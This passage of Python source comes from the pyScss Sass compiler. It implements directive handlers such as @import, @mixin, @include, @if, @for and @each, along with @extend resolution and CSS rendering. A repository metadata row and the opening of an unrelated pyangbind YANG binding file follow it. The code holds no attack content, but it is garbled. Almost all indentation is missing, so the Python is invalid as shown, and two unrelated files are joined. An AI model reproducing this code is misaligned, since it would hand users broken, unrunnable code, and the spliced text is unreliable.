log.warn("Unused @import: '%s' (%s)", name, file_and_line)
def _make_calculator(self, namespace):
return Calculator(
namespace,
ignore_parse_errors=self.ignore_parse_errors,
undefined_variables_fatal=self.compiler.undefined_variables_fatal,
)
# @print_timing(4)
def manage_children(self, rule, scope):
try:
self._manage_children_impl(rule, scope)
except SassBaseError as e:
e.add_rule(rule)
raise
except Exception as e:
raise SassError(e, rule=rule)
def _manage_children_impl(self, rule, scope):
calculator = self._make_calculator(rule.namespace)
for c_lineno, c_property, c_codestr in locate_blocks(rule.unparsed_contents):
block = UnparsedBlock(rule, c_lineno, c_property, c_codestr)
####################################################################
# At (@) blocks
if block.is_atrule:
# TODO particularly wild idea: allow extensions to handle
# unrecognized blocks, and get the pyscss stuff out of the
# core? even move the core stuff into the core extension?
code = block.directive
code = '_at_' + code.lower().replace(' ', '_')[1:]
try:
method = getattr(self, code)
except AttributeError:
if block.unparsed_contents is None:
rule.properties.append((block.prop, None))
elif scope is None: # needs to have no scope to crawl down the nested rules
self._nest_at_rules(rule, scope, block)
else:
method(calculator, rule, scope, block)
####################################################################
# Properties
elif block.unparsed_contents is None:
self._get_properties(rule, scope, block)
# Nested properties
elif block.is_scope:
if block.header.unscoped_value:
# Possibly deal with default unscoped value
self._get_properties(rule, scope, block)
rule.unparsed_contents = block.unparsed_contents
subscope = (scope or '') + block.header.scope + '-'
self.manage_children(rule, subscope)
####################################################################
# Nested rules
elif scope is None: # needs to have no scope to crawl down the nested rules
self._nest_rules(rule, scope, block)
def _at_warn(self, calculator, rule, scope, block):
"""
Implements @warn
"""
value = calculator.calculate(block.argument)
log.warn(repr(value))
def _at_print(self, calculator, rule, scope, block):
"""
Implements @print
"""
value = calculator.calculate(block.argument)
sys.stderr.write("%s\n" % value)
def _at_raw(self, calculator, rule, scope, block):
"""
Implements @raw
"""
value = calculator.calculate(block.argument)
sys.stderr.write("%s\n" % repr(value))
def _at_dump_context(self, calculator, rule, scope, block):
"""
Implements @dump_context
"""
sys.stderr.write("%s\n" % repr(rule.namespace._variables))
def _at_dump_functions(self, calculator, rule, scope, block):
"""
Implements @dump_functions
"""
sys.stderr.write("%s\n" % repr(rule.namespace._functions))
def _at_dump_mixins(self, calculator, rule, scope, block):
"""
Implements @dump_mixins
"""
sys.stderr.write("%s\n" % repr(rule.namespace._mixins))
def _at_dump_imports(self, calculator, rule, scope, block):
"""
Implements @dump_imports
"""
sys.stderr.write("%s\n" % repr(rule.namespace._imports))
def _at_dump_options(self, calculator, rule, scope, block):
"""
Implements @dump_options
"""
sys.stderr.write("%s\n" % repr(rule.options))
def _at_debug(self, calculator, rule, scope, block):
"""
Implements @debug
"""
setting = block.argument.strip()
if setting.lower() in ('1', 'true', 't', 'yes', 'y', 'on'):
setting = True
elif setting.lower() in ('0', 'false', 'f', 'no', 'n', 'off', 'undefined'):
setting = False
self.ignore_parse_errors = setting
log.info("Debug mode is %s", 'On' if self.ignore_parse_errors else 'Off')
def _at_pdb(self, calculator, rule, scope, block):
"""
Implements @pdb
"""
try:
import ipdb as pdb
except ImportError:
import pdb
pdb.set_trace()
def _at_extend(self, calculator, rule, scope, block):
"""
Implements @extend
"""
from scss.selector import Selector
selectors = calculator.apply_vars(block.argument)
rule.extends_selectors.extend(Selector.parse_many(selectors))
def _at_return(self, calculator, rule, scope, block):
"""
Implements @return
"""
# TODO should assert this only happens within a @function
ret = calculator.calculate(block.argument)
raise SassReturn(ret)
# @print_timing(10)
def _at_option(self, calculator, rule, scope, block):
"""
Implements @option
"""
# TODO This only actually supports "style" (which only really makes
# sense as the first thing in a single input file) or "warn_unused"
# (which only makes sense at file level /at best/). Explore either
# replacing this with a better mechanism or dropping it entirely.
# Note also that all rules share the same underlying legacy option
# dict, so the rules aren't even lexically scoped like you might think,
# and @importing a file can change the compiler! That seems totally
# wrong.
for option in block.argument.split(','):
key, colon, value = option.partition(':')
key = key.strip().lower().replace('-', '_')
value = value.strip().lower()
if value in ('1', 'true', 't', 'yes', 'y', 'on'):
value = True
elif value in ('0', 'false', 'f', 'no', 'n', 'off', 'undefined'):
value = False
elif not colon:
value = True
if key == 'compress':
warn_deprecated(
rule,
"The 'compress' @option is deprecated. "
"Please use 'style' instead."
)
key = 'style'
value = 'compressed' if value else 'legacy'
if key in ('short_colors', 'reverse_colors'):
warn_deprecated(
rule,
"The '{0}' @option no longer has any effect."
.format(key),
)
return
elif key == 'style':
try:
OutputStyle[value]
except KeyError:
raise SassError("No such output style: {0}".format(value))
elif key in ('warn_unused', 'control_scoping'):
# TODO deprecate control_scoping? or add it to compiler?
if not isinstance(value, bool):
raise SassError("The '{0}' @option requires a bool, not {1!r}".format(key, value))
else:
raise SassError("Unknown @option: {0}".format(key))
rule.legacy_compiler_options[key] = value
def _get_funct_def(self, rule, calculator, argument):
funct, lpar, argstr = argument.partition('(')
funct = calculator.do_glob_math(funct)
funct = normalize_var(funct.strip())
argstr = argstr.strip()
# Parse arguments with the argspec rule
if lpar:
if not argstr.endswith(')'):
raise SyntaxError("Expected ')', found end of line for %s (%s)" % (funct, rule.file_and_line))
argstr = argstr[:-1].strip()
else:
# Whoops, no parens at all. That's like calling with no arguments.
argstr = ''
argspec_node = calculator.parse_expression(argstr, target='goal_argspec')
return funct, argspec_node
def _populate_namespace_from_call(self, name, callee_namespace, mixin, args, kwargs):
# Mutation protection
args = list(args)
kwargs = OrderedDict(kwargs)
#m_params = mixin[0]
#m_defaults = mixin[1]
#m_codestr = mixin[2]
pristine_callee_namespace = mixin[3]
callee_argspec = mixin[4]
import_key = mixin[5]
callee_calculator = self._make_calculator(callee_namespace)
# Populate the mixin/function's namespace with its arguments
for var_name, node in callee_argspec.iter_def_argspec():
if args:
# If there are positional arguments left, use the first
value = args.pop(0)
elif var_name in kwargs:
# Try keyword arguments
value = kwargs.pop(var_name)
elif node is not None:
# OK, try the default argument. Using callee_calculator means
# that default values of arguments can refer to earlier
# arguments' values; yes, that is how Sass works.
value = node.evaluate(callee_calculator, divide=True)
else:
# TODO this should raise
value = Undefined()
callee_namespace.set_variable(var_name, value, local_only=True)
if callee_argspec.slurp:
# Slurpy var gets whatever is left
# TODO should preserve the order of extra kwargs
sass_kwargs = []
for key, value in kwargs.items():
sass_kwargs.append((String(key[1:]), value))
callee_namespace.set_variable(
callee_argspec.slurp.name,
Arglist(args, sass_kwargs))
args = []
kwargs = {}
elif callee_argspec.inject:
# Callee namespace gets all the extra kwargs whether declared or
# not
for var_name, value in kwargs.items():
callee_namespace.set_variable(var_name, value, local_only=True)
kwargs = {}
# TODO would be nice to say where the mixin/function came from
if kwargs:
            raise NameError("%s has no such argument %s" % (name, list(kwargs)[0]))
if args:
raise NameError("%s received extra arguments: %r" % (name, args))
pristine_callee_namespace.use_import(import_key)
return callee_namespace
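    # Binding order implemented above, matching Sass semantics: positional
    # args first, then keywords, then the default expression evaluated in
    # the callee's own scope (so defaults may reference earlier parameters),
    # and finally Undefined. Leftovers go to a slurpy parameter or, with
    # argument injection, straight into the callee namespace; anything still
    # unbound raises NameError.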
# @print_timing(10)
def _at_function(self, calculator, rule, scope, block):
"""
Implements @mixin and @function
"""
if not block.argument:
raise SyntaxError("%s requires a function name (%s)" % (block.directive, rule.file_and_line))
funct, argspec_node = self._get_funct_def(rule, calculator, block.argument)
defaults = {}
new_params = []
for var_name, default in argspec_node.iter_def_argspec():
new_params.append(var_name)
if default is not None:
defaults[var_name] = default
# TODO a function or mixin is re-parsed every time it's called; there's
# no AST for anything but expressions :(
mixin = [rule.source_file, block.lineno, block.unparsed_contents, rule.namespace, argspec_node, rule.source_file]
if block.directive == '@function':
def _call(mixin):
def __call(namespace, *args, **kwargs):
source_file = mixin[0]
lineno = mixin[1]
m_codestr = mixin[2]
pristine_callee_namespace = mixin[3]
callee_namespace = pristine_callee_namespace.derive()
# TODO CallOp converts Sass names to Python names, so we
# have to convert them back to Sass names. would be nice
# to avoid this back-and-forth somehow
kwargs = OrderedDict(
(normalize_var('$' + key), value)
for (key, value) in kwargs.items())
self._populate_namespace_from_call(
"Function {0}".format(funct),
callee_namespace, mixin, args, kwargs)
_rule = SassRule(
source_file=source_file,
lineno=lineno,
unparsed_contents=m_codestr,
namespace=callee_namespace,
# rule
import_key=rule.import_key,
legacy_compiler_options=rule.legacy_compiler_options,
options=rule.options,
properties=rule.properties,
extends_selectors=rule.extends_selectors,
ancestry=rule.ancestry,
nested=rule.nested,
)
# TODO supposed to throw an error if there's a slurpy arg
# but keywords() is never called on it
try:
self.manage_children(_rule, scope)
except SassReturn as e:
return e.retval
else:
return Null()
return __call
_mixin = _call(mixin)
_mixin.mixin = mixin
mixin = _mixin
if block.directive == '@mixin':
add = rule.namespace.set_mixin
elif block.directive == '@function':
add = rule.namespace.set_function
# Register the mixin for every possible arity it takes
if argspec_node.slurp or argspec_node.inject:
add(funct, None, mixin)
else:
while len(new_params):
add(funct, len(new_params), mixin)
param = new_params.pop()
if param not in defaults:
break
if not new_params:
add(funct, 0, mixin)
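    # E.g. a definition like '@mixin pad($a, $b: 1px)' is registered under
    # arity 2 and, because $b has a default, arity 1 as well (plus arity 0
    # via the final fallback once the parameter list is exhausted).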
_at_mixin = _at_function
# @print_timing(10)
def _at_include(self, calculator, rule, scope, block):
"""
Implements @include, for @mixins
"""
caller_namespace = rule.namespace
caller_calculator = self._make_calculator(caller_namespace)
funct, caller_argspec = self._get_funct_def(rule, caller_calculator, block.argument)
# Render the passed arguments, using the caller's namespace
args, kwargs = caller_argspec.evaluate_call_args(caller_calculator)
argc = len(args) + len(kwargs)
try:
mixin = caller_namespace.mixin(funct, argc)
except KeyError:
try:
# TODO maybe? don't do this, once '...' works
# Fallback to single parameter:
mixin = caller_namespace.mixin(funct, 1)
except KeyError:
log.error("Mixin not found: %s:%d (%s)", funct, argc, rule.file_and_line, extra={'stack': True})
return
else:
args = [List(args, use_comma=True)]
# TODO what happens to kwargs?
source_file = mixin[0]
lineno = mixin[1]
m_codestr = mixin[2]
pristine_callee_namespace = mixin[3]
callee_argspec = mixin[4]
if caller_argspec.inject and callee_argspec.inject:
# DEVIATION: Pass the ENTIRE local namespace to the mixin (yikes)
callee_namespace = Namespace.derive_from(
caller_namespace,
pristine_callee_namespace)
else:
callee_namespace = pristine_callee_namespace.derive()
self._populate_namespace_from_call(
"Mixin {0}".format(funct),
callee_namespace, mixin, args, kwargs)
_rule = SassRule(
# These must be file and line in which the @include occurs
source_file=rule.source_file,
lineno=rule.lineno,
# These must be file and line in which the @mixin was defined
from_source_file=source_file,
from_lineno=lineno,
unparsed_contents=m_codestr,
namespace=callee_namespace,
# rule
import_key=rule.import_key,
legacy_compiler_options=rule.legacy_compiler_options,
options=rule.options,
properties=rule.properties,
extends_selectors=rule.extends_selectors,
ancestry=rule.ancestry,
nested=rule.nested,
)
_rule.options['@content'] = block.unparsed_contents
self.manage_children(_rule, scope)
# @print_timing(10)
def _at_content(self, calculator, rule, scope, block):
"""
Implements @content
"""
if '@content' not in rule.options:
log.error("Content string not found for @content (%s)", rule.file_and_line)
rule.unparsed_contents = rule.options.pop('@content', '')
self.manage_children(rule, scope)
# @print_timing(10)
def _at_import(self, calculator, rule, scope, block):
"""
Implements @import
Load and import mixins and functions and rules
"""
# TODO it would be neat to opt into warning that you're using
# values/functions from a file you didn't explicitly import
# TODO base-level directives, like @mixin or @charset, aren't allowed
# to be @imported into a nested block
# TODO i'm not sure we disallow them nested in the first place
# TODO @import is disallowed within mixins, control directives
# TODO @import doesn't take a block -- that's probably an issue with a
# lot of our directives
# TODO if there's any #{}-interpolation in the AST, this should become
# a CSS import (though in practice Ruby only even evaluates it in url()
# -- in a string it's literal!)
sass_paths = calculator.evaluate_expression(block.argument)
css_imports = []
for sass_path in sass_paths:
# These are the rules for when an @import is interpreted as a CSS
# import:
if (
# If it's a url()
isinstance(sass_path, Url) or
# If it's not a string (including `"foo" screen`, a List)
not isinstance(sass_path, String) or
# If the filename begins with an http protocol
sass_path.value.startswith(('http://', 'https://')) or
# If the filename ends with .css
sass_path.value.endswith(self.compiler.static_extensions)):
css_imports.append(sass_path.render(compress=False))
continue
# Should be left with a plain String
name = sass_path.value
source = None
for extension in self.compiler.extensions:
source = extension.handle_import(name, self, rule)
if source:
break
else:
# Didn't find anything!
raise SassImportError(name, self.compiler, rule=rule)
source = self.add_source(source)
if rule.namespace.has_import(source):
# If already imported in this scope, skip
# TODO this might not be right -- consider if you @import a
# file at top level, then @import it inside a selector block!
continue
_rule = SassRule(
source_file=source,
lineno=block.lineno,
unparsed_contents=source.contents,
# rule
legacy_compiler_options=rule.legacy_compiler_options,
options=rule.options,
properties=rule.properties,
extends_selectors=rule.extends_selectors,
ancestry=rule.ancestry,
namespace=rule.namespace,
)
rule.namespace.add_import(source, rule)
self.manage_children(_rule, scope)
# Create a new @import rule for each import determined to be CSS
for import_ in css_imports:
# TODO this seems extremely janky (surely we should create an
# actual new Rule), but the CSS rendering doesn't understand how to
# print rules without blocks
# TODO if this ever creates a new Rule, shuffle stuff around so
# this is still hoisted to the top
rule.properties.append(('@import ' + import_, None))
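    # Illustrative: `@import url(print.css), "base";` appends a literal
    # '@import url(print.css)' property to the output and compiles "base"
    # inline through the extension import handlers.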
# @print_timing(10)
def _at_if(self, calculator, rule, scope, block):
"""
Implements @if and @else if
"""
# "@if" indicates whether any kind of `if` since the last `@else` has
# succeeded, in which case `@else if` should be skipped
if block.directive != '@if':
if '@if' not in rule.options:
raise SyntaxError("@else with no @if (%s)" % (rule.file_and_line,))
if rule.options['@if']:
# Last @if succeeded; stop here
return
condition = calculator.calculate(block.argument)
if condition:
inner_rule = rule.copy()
inner_rule.unparsed_contents = block.unparsed_contents
if not self.should_scope_loop_in_rule(inner_rule):
# DEVIATION: Allow not creating a new namespace
inner_rule.namespace = rule.namespace
self.manage_children(inner_rule, scope)
rule.options['@if'] = condition
_at_else_if = _at_if
# @print_timing(10)
def _at_else(self, calculator, rule, scope, block):
"""
Implements @else
"""
if '@if' not in rule.options:
log.error("@else with no @if (%s)", rule.file_and_line)
val = rule.options.pop('@if', True)
if not val:
inner_rule = rule.copy()
            inner_rule.unparsed_contents = block.unparsed_contents
            inner_rule.namespace = rule.namespace  # DEVIATION: Commenting this line gives the Sass behavior
self.manage_children(inner_rule, scope)
# @print_timing(10)
def _at_for(self, calculator, rule, scope, block):
"""
Implements @for
"""
var, _, name = block.argument.partition(' from ')
frm, _, through = name.partition(' through ')
if through:
inclusive = True
else:
inclusive = False
frm, _, through = frm.partition(' to ')
frm = calculator.calculate(frm)
through = calculator.calculate(through)
try:
frm = int(float(frm))
through = int(float(through))
except ValueError:
return
if frm > through:
# DEVIATION: allow reversed '@for .. from .. through' (same as enumerate() and range())
frm, through = through, frm
rev = reversed
else:
rev = lambda x: x
var = var.strip()
var = calculator.do_glob_math(var)
var = normalize_var(var)
inner_rule = rule.copy()
inner_rule.unparsed_contents = block.unparsed_contents
if not self.should_scope_loop_in_rule(inner_rule):
# DEVIATION: Allow not creating a new namespace
inner_rule.namespace = rule.namespace
if inclusive:
through += 1
for i in rev(range(frm, through)):
inner_rule.namespace.set_variable(var, Number(i))
self.manage_children(inner_rule, scope)
# @print_timing(10)
def _at_each(self, calculator, rule, scope, block):
"""
Implements @each
"""
varstring, _, valuestring = block.argument.partition(' in ')
values = calculator.calculate(valuestring)
if not values:
return
varlist = [
normalize_var(calculator.do_glob_math(var.strip()))
# TODO use list parsing here
for var in varstring.split(",")
]
# `@each $foo, in $bar` unpacks, but `@each $foo in $bar` does not!
unpack = len(varlist) > 1
if not varlist[-1]:
varlist.pop()
inner_rule = rule.copy()
inner_rule.unparsed_contents = block.unparsed_contents
if not self.should_scope_loop_in_rule(inner_rule):
# DEVIATION: Allow not creating a new namespace
inner_rule.namespace = rule.namespace
for v in List.from_maybe(values):
if unpack:
v = List.from_maybe(v)
for i, var in enumerate(varlist):
if i >= len(v):
value = Null()
else:
value = v[i]
inner_rule.namespace.set_variable(var, value)
else:
inner_rule.namespace.set_variable(varlist[0], v)
self.manage_children(inner_rule, scope)
# @print_timing(10)
def _at_while(self, calculator, rule, scope, block):
"""
Implements @while
"""
first_condition = condition = calculator.calculate(block.argument)
while condition:
inner_rule = rule.copy()
inner_rule.unparsed_contents = block.unparsed_contents
if not self.should_scope_loop_in_rule(inner_rule):
# DEVIATION: Allow not creating a new namespace
inner_rule.namespace = rule.namespace
self.manage_children(inner_rule, scope)
condition = calculator.calculate(block.argument)
rule.options['@if'] = first_condition
# @print_timing(10)
def _at_variables(self, calculator, rule, scope, block):
"""
Implements @variables and @vars
"""
warn_deprecated(
rule,
"@variables and @vars are deprecated. "
"Just assign variables at top-level.")
_rule = rule.copy()
_rule.unparsed_contents = block.unparsed_contents
_rule.namespace = rule.namespace
_rule.properties = []
self.manage_children(_rule, scope)
_at_vars = _at_variables
# @print_timing(10)
def _get_properties(self, rule, scope, block):
"""
        Implements property and variable extraction and assignment
"""
prop, raw_value = (_prop_split_re.split(block.prop, 1) + [None])[:2]
if raw_value is not None:
raw_value = raw_value.strip()
try:
is_var = (block.prop[len(prop)] == '=')
except IndexError:
is_var = False
if is_var:
warn_deprecated(rule, "Assignment with = is deprecated; use : instead.")
calculator = self._make_calculator(rule.namespace)
prop = prop.strip()
prop = calculator.do_glob_math(prop)
if not prop:
return
_prop = (scope or '') + prop
        if is_var or (prop.startswith('$') and raw_value is not None):
# Pop off any flags: !default, !global
is_default = False
is_global = True # eventually sass will default this to false
while True:
splits = raw_value.rsplit(None, 1)
if len(splits) < 2 or not splits[1].startswith('!'):
break
raw_value, flag = splits
if flag == '!default':
is_default = True
elif flag == '!global':
is_global = True
else:
raise ValueError("Unrecognized flag: {0}".format(flag))
# Variable assignment
_prop = normalize_var(_prop)
try:
existing_value = rule.namespace.variable(_prop)
except KeyError:
existing_value = None
is_defined = existing_value is not None and not existing_value.is_null
if is_default and is_defined:
pass
else:
if is_defined and prop.startswith('$') and prop[1].isupper():
log.warn("Constant %r redefined", prop)
# Variable assignment is an expression, so it always performs
# real division
value = calculator.calculate(raw_value, divide=True)
rule.namespace.set_variable(
_prop, value, local_only=not is_global)
else:
# Regular property destined for output
_prop = calculator.apply_vars(_prop)
if raw_value is None:
value = None
else:
value = calculator.calculate(raw_value)
if value is None:
pass
elif isinstance(value, six.string_types):
# TODO kill this branch
pass
else:
style = rule.legacy_compiler_options.get(
'style', self.compiler.output_style)
compress = style == 'compressed'
value = value.render(compress=compress)
rule.properties.append((_prop, value))
# @print_timing(10)
def _nest_at_rules(self, rule, scope, block):
"""
Implements @-blocks
"""
# TODO handle @charset, probably?
# Interpolate the current block
# TODO this seems like it should be done in the block header. and more
# generally?
calculator = self._make_calculator(rule.namespace)
if block.header.argument:
# TODO is this correct? do ALL at-rules ALWAYS allow both vars and
# interpolation?
node = calculator.parse_vars_and_interpolations(
block.header.argument)
block.header.argument = node.evaluate(calculator).render()
# TODO merge into RuleAncestry
new_ancestry = list(rule.ancestry.headers)
if block.directive == '@media' and new_ancestry:
for i, header in reversed(list(enumerate(new_ancestry))):
if header.is_selector:
continue
elif header.directive == '@media':
new_ancestry[i] = BlockAtRuleHeader(
'@media',
"%s and %s" % (header.argument, block.argument))
break
else:
new_ancestry.insert(i, block.header)
else:
new_ancestry.insert(0, block.header)
else:
new_ancestry.append(block.header)
rule.descendants += 1
new_rule = SassRule(
source_file=rule.source_file,
import_key=rule.import_key,
lineno=block.lineno,
num_header_lines=block.header.num_lines,
unparsed_contents=block.unparsed_contents,
legacy_compiler_options=rule.legacy_compiler_options,
options=rule.options.copy(),
#properties
#extends_selectors
ancestry=RuleAncestry(new_ancestry),
namespace=rule.namespace.derive(),
nested=rule.nested + 1,
)
self.rules.append(new_rule)
rule.namespace.use_import(rule.source_file)
self.manage_children(new_rule, scope)
self._warn_unused_imports(new_rule)
# @print_timing(10)
def _nest_rules(self, rule, scope, block):
"""
Implements Nested CSS rules
"""
calculator = self._make_calculator(rule.namespace)
raw_selectors = calculator.do_glob_math(block.prop)
# DEVIATION: ruby sass doesn't support bare variables in selectors
raw_selectors = calculator.apply_vars(raw_selectors)
c_selectors, c_parents = self.parse_selectors(raw_selectors)
if c_parents:
warn_deprecated(
rule,
"The XCSS 'a extends b' syntax is deprecated. "
"Use 'a { @extend b; }' instead."
)
new_ancestry = rule.ancestry.with_nested_selectors(c_selectors)
rule.descendants += 1
new_rule = SassRule(
source_file=rule.source_file,
import_key=rule.import_key,
lineno=block.lineno,
num_header_lines=block.header.num_lines,
unparsed_contents=block.unparsed_contents,
legacy_compiler_options=rule.legacy_compiler_options,
options=rule.options.copy(),
#properties
extends_selectors=c_parents,
ancestry=new_ancestry,
namespace=rule.namespace.derive(),
nested=rule.nested + 1,
)
self.rules.append(new_rule)
rule.namespace.use_import(rule.source_file)
self.manage_children(new_rule, scope)
self._warn_unused_imports(new_rule)
# @print_timing(3)
def apply_extends(self, rules):
"""Run through the given rules and translate all the pending @extends
declarations into real selectors on parent rules.
The list is modified in-place and also sorted in dependency order.
"""
# Game plan: for each rule that has an @extend, add its selectors to
# every rule that matches that @extend.
# First, rig a way to find arbitrary selectors quickly. Most selectors
# revolve around elements, classes, and IDs, so parse those out and use
# them as a rough key. Ignore order and duplication for now.
key_to_selectors = defaultdict(set)
selector_to_rules = defaultdict(set)
rule_selector_order = {}
order = 0
for rule in rules:
for selector in rule.selectors:
for key in selector.lookup_key():
key_to_selectors[key].add(selector)
selector_to_rules[selector].add(rule)
rule_selector_order[rule, selector] = order
order += 1
# Now go through all the rules with an @extends and find their parent
# rules.
for rule in rules:
for selector in rule.extends_selectors:
# This is a little dirty. intersection isn't a class method.
# Don't think about it too much.
candidates = set.intersection(*(
key_to_selectors[key] for key in selector.lookup_key()))
extendable_selectors = [
candidate for candidate in candidates
if candidate.is_superset_of(selector)]
if not extendable_selectors:
# TODO implement !optional
warn_deprecated(
rule,
"Can't find any matching rules to extend {0!r} -- this "
"will be fatal in 2.0, unless !optional is specified!"
.format(selector.render()))
continue
# Armed with a set of selectors that this rule can extend, do
# some substitution and modify the appropriate parent rules.
# One tricky bit: it's possible we're extending two selectors
# that both exist in the same parent rule, in which case we
# want to extend in the order the original selectors appear in
# that rule.
known_parents = []
for extendable_selector in extendable_selectors:
parent_rules = selector_to_rules[extendable_selector]
for parent_rule in parent_rules:
if parent_rule is rule:
# Don't extend oneself
continue
known_parents.append(
(parent_rule, extendable_selector))
# This will put our parents back in their original order
known_parents.sort(key=rule_selector_order.__getitem__)
for parent_rule, extendable_selector in known_parents:
more_parent_selectors = []
for rule_selector in rule.selectors:
more_parent_selectors.extend(
extendable_selector.substitute(
selector, rule_selector))
for parent in more_parent_selectors:
# Update indices, in case later rules try to extend
# this one
for key in parent.lookup_key():
key_to_selectors[key].add(parent)
selector_to_rules[parent].add(parent_rule)
rule_selector_order[parent_rule, parent] = order
order += 1
parent_rule.ancestry = (
parent_rule.ancestry.with_more_selectors(
more_parent_selectors))
# Remove placeholder-only rules
return [rule for rule in rules if not rule.is_pure_placeholder]
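    # Illustrative: given '.error { color: red; }' and
    # '.fatal { @extend .error; }', this pass rewrites the first rule's
    # ancestry to cover '.error, .fatal' and finally drops any rules whose
    # selectors were all placeholders.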
# @print_timing(3)
def parse_properties(self):
css_files = []
seen_files = set()
rules_by_file = {}
for rule in self.rules:
source_file = rule.source_file
rules_by_file.setdefault(source_file, []).append(rule)
if rule.is_empty:
continue
if source_file not in seen_files:
seen_files.add(source_file)
css_files.append(source_file)
return rules_by_file, css_files
# @print_timing(3)
def create_css(self, rules):
"""
Generate the final CSS string
"""
style = rules[0].legacy_compiler_options.get(
'style', self.compiler.output_style)
debug_info = self.compiler.generate_source_map
if style == 'legacy':
sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg = True, ' ', ' ', False, '', '\n', '\n', '\n', debug_info
elif style == 'compressed':
sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg = False, '', '', False, '', '', '', '', False
elif style == 'compact':
sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg = True, ' ', '', False, '\n', ' ', '\n', ' ', debug_info
elif style == 'expanded':
sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg = True, ' ', ' ', False, '\n', '\n', '\n', '\n', debug_info
else: # if style == 'nested':
sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg = True, ' ', ' ', True, '\n', '\n', '\n', ' ', debug_info
return self._create_css(rules, sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg)
def _textwrap(self, txt, width=70):
if not hasattr(self, '_textwrap_wordsep_re'):
self._textwrap_wordsep_re = re.compile(r'(?<=,)\s+')
self._textwrap_strings_re = re.compile(r'''(["'])(?:(?!\1)[^\\]|\\.)*\1''')
# First, remove commas from anything within strings (marking commas as \0):
def _repl(m):
ori = m.group(0)
fin = ori.replace(',', '\0')
if ori != fin:
subs[fin] = ori
return fin
subs = {}
txt = self._textwrap_strings_re.sub(_repl, txt)
# Mark split points for word separators using (marking spaces with \1):
txt = self._textwrap_wordsep_re.sub('\1', txt)
# Replace all the strings back:
for fin, ori in subs.items():
txt = txt.replace(fin, ori)
# Split in chunks:
chunks = txt.split('\1')
# Break in lines of at most long_width width appending chunks:
ln = ''
lines = []
long_width = int(width * 1.2)
for chunk in chunks:
_ln = ln + ' ' if ln else ''
_ln += chunk
if len(ln) >= width or len(_ln) >= long_width:
if ln:
lines.append(ln)
_ln = chunk
ln = _ln
if ln:
lines.append(ln)
return lines
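    # Illustrative: _textwrap('a, b, c', width=5) returns ['a, b,', 'c'] --
    # the text is chunked after commas (commas inside quoted strings are
    # protected first) and chunks are re-joined greedily up to ~1.2x width.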
def _create_css(self, rules, sc=True, sp=' ', tb=' ', nst=True, srnl='\n', nl='\n', rnl='\n', lnl='', debug_info=False):
super_selector = self.compiler.super_selector
if super_selector:
super_selector += ' '
skip_selectors = False
prev_ancestry_headers = []
total_rules = 0
total_selectors = 0
result = ''
dangling_property = False
separate = False
nesting = current_nesting = last_nesting = -1 if nst else 0
nesting_stack = []
for rule in rules:
nested = rule.nested
if nested <= 1:
separate = True
if nst:
last_nesting = current_nesting
current_nesting = nested
delta_nesting = current_nesting - last_nesting
if delta_nesting > 0:
nesting_stack += [nesting] * delta_nesting
elif delta_nesting < 0:
nesting_stack = nesting_stack[:delta_nesting]
nesting = nesting_stack[-1]
if rule.is_empty:
continue
if nst:
nesting += 1
ancestry = rule.ancestry
ancestry_len = len(ancestry)
first_mismatch = 0
for i, (old_header, new_header) in enumerate(zip(prev_ancestry_headers, ancestry.headers)):
if old_header != new_header:
first_mismatch = i
break
# When sc is False, sets of properties are printed without a
# trailing semicolon. If the previous block isn't being closed,
# that trailing semicolon needs adding in to separate the last
# property from the next rule.
if not sc and dangling_property and first_mismatch >= len(prev_ancestry_headers):
result += ';'
# Close blocks and outdent as necessary
for i in range(len(prev_ancestry_headers), first_mismatch, -1):
result += tb * (i - 1) + '}' + rnl
# Open new blocks as necessary
for i in range(first_mismatch, ancestry_len):
header = ancestry.headers[i]
if separate:
if result:
result += srnl
separate = False
if debug_info:
def _print_debug_info(filename, lineno):
if debug_info == 'comments':
result = tb * (i + nesting) + "/* file: %s, line: %s */" % (filename, lineno) + nl
else:
filename = _escape_chars_re.sub(r'\\\1', filename)
result = tb * (i + nesting) + "@media -sass-debug-info{filename{font-family:file\:\/\/%s}line{font-family:\\00003%s}}" % (filename, lineno) + nl
return result
if rule.lineno and rule.source_file:
result += _print_debug_info(rule.source_file.path, rule.lineno)
if rule.from_lineno and rule.from_source_file:
result += _print_debug_info(rule.from_source_file.path, rule.from_lineno)
if header.is_selector:
header_string = header.render(sep=',' + sp, super_selector=super_selector)
if nl:
header_string = (nl + tb * (i + nesting)).join(self._textwrap(header_string))
else:
header_string = header.render()
result += tb * (i + nesting) + header_string + sp + '{' + nl
total_rules += 1
if header.is_selector:
total_selectors += 1
prev_ancestry_headers = ancestry.headers
dangling_property = False
if not skip_selectors:
result += self._print_properties(rule.properties, sc, sp, tb * (ancestry_len + nesting), nl, lnl)
dangling_property = True
# Close all remaining blocks
for i in reversed(range(len(prev_ancestry_headers))):
result += tb * i + '}' + rnl
# Always end with a newline, even in compressed mode
if not result.endswith('\n'):
result += '\n'
return (result, total_rules, total_selectors)
def _print_properties(self, properties, sc=True, sp=' ', tb='', nl='\n', lnl=' '):
result = ''
last_prop_index = len(properties) - 1
for i, (name, value) in enumerate(properties):
if value is None:
prop = name
elif value:
if nl:
value = (nl + tb + tb).join(self._textwrap(value))
prop = name + ':' + sp + value
else:
# Empty string means there's supposed to be a value but it
# evaluated to nothing; skip this
# TODO interacts poorly with last_prop_index
continue
if i == last_prop_index:
if sc:
result += tb + prop + ';' + lnl
else:
result += tb + prop + lnl
else:
result += tb + prop + ';' + nl
return result
class SassReturn(SassBaseError):
"""Special control-flow exception used to hop up the stack from a Sass
function's ``@return``.
"""
def __init__(self, retval):
super(SassReturn, self).__init__()
self.retval = retval
def __str__(self):
return "Returning {0!r}".format(self.retval)
|
hashamali/pyScss
|
scss/compiler.py
|
Python
|
mit
| 59,822 | 0.000953 |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
